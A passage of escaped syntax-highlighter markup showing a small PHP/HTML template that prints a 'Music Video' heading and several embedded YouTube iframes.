inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;video&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-80&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-ta&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(255, 0, 0) !important;&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-81&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;h3&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;Music &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;Video&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;h3&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-82&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;iframe &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;width&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;520&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;height&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;293&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;src&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;//www.youtube.com/embed/iv-8-EgPEY0?rel=0&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;frameborder&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;0&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;allowfullscreen&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;iframe&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-83&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;iframe &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;width&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;520&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;height&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;293&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;src&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;//www.youtube.com/embed/xnku4o3tRB4?rel=0&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;frameborder&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;0&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;allowfullscreen&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;iframe&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-84&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;iframe &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;width&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;520&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;height&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;293&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;src&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;//www.youtube.com/embed/n8I8QGFA1oM?rel=0&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;frameborder&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;0&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;allowfullscreen&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit 